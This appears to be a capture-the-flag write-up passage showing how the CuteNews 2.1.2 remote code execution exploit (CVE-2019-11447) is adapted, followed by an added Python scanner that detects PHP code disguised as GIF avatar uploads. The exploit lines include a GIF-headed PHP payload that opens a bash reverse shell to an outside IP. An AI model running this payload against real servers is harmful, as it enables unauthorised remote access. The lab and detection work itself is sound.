Foothold

adot@pwnbox:~/oscp/provinggrounds/easy/bbscute$ searchsploit -m 48800
  Exploit: CuteNews 2.1.2 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48800
     Path: /usr/share/exploitdb/exploits/php/webapps/48800.py
    Codes: CVE-2019-11447
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/adot/oscp/provinggrounds/easy/bbscute/48800.py

Edit the script to remove the /CuteNews web directory from its request paths, so that everything runs off the root directory of the website.

payload = f'''GIF89a;\n<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.216/1337 0>&1'");?>'''.encode()
payload_send = sess.post(f"{ip}/index.php", files = files).text
    print("============================\nDropping to a SHELL\n============================")
    os.system("curl " + (f"{ip}/uploads/avatar_{logged_user}_{logged_user}.php"))
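
Added example (not part of the original writeup or of the exploit script): a defender-side check for the upload shape the payload above relies on, a GIF89a header followed by a PHP tag and stored under an executable name in uploads/. The extension list, the function names and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Extensions a PHP-enabled web server may execute (assumed list; match it to the server config).
EXEC_EXT = {".php", ".phtml", ".php5", ".phar"}
# Image signatures an avatar is allowed to start with (GIF, PNG, JPEG).
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
# PHP open tags; bare "<?" short tags are left out to limit false positives on binary data.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def classify_upload(name: str, data: bytes) -> list[str]:
    """Return the reasons an uploaded avatar should be rejected (empty list = accept)."""
    reasons = []
    if Path(name).suffix.lower() in EXEC_EXT:
        reasons.append("executable extension")
    if not data.startswith(IMAGE_MAGIC):
        reasons.append("no image signature")
    if PHP_TAG.search(data):
        reasons.append("embedded PHP tag")
    return reasons


def scan_uploads(directory: Path) -> dict[str, list[str]]:
    """Audit an existing uploads directory; map file name -> reasons for flagged files."""
    findings = {}
    for path in sorted(directory.iterdir()):
        if path.is_file():
            reasons = classify_upload(path.name, path.read_bytes())
            if reasons:
                findings[path.name] = reasons
    return findings


def demo() -> dict[str, list[str]]:
    """Build a constructed uploads directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        # Constructed samples: one clean GIF header, two files with a PHP tag after the header.
        (root / "avatar_alice_alice.gif").write_bytes(b"GIF89a" + b"\x01\x00\x01\x00\x00\x00\x00")
        (root / "avatar_bob_bob.php").write_bytes(b"GIF89a;\n<?php echo 'marker'; ?>")
        (root / "avatar_eve_eve.gif").write_bytes(b"GIF89a;\n<?php echo 'marker'; ?>")
        return scan_uploads(root)


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(f"{name}: {', '.join(reasons)}")
```

A magic-byte check alone accepts this file, which is why the extension and the content are checked separately.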
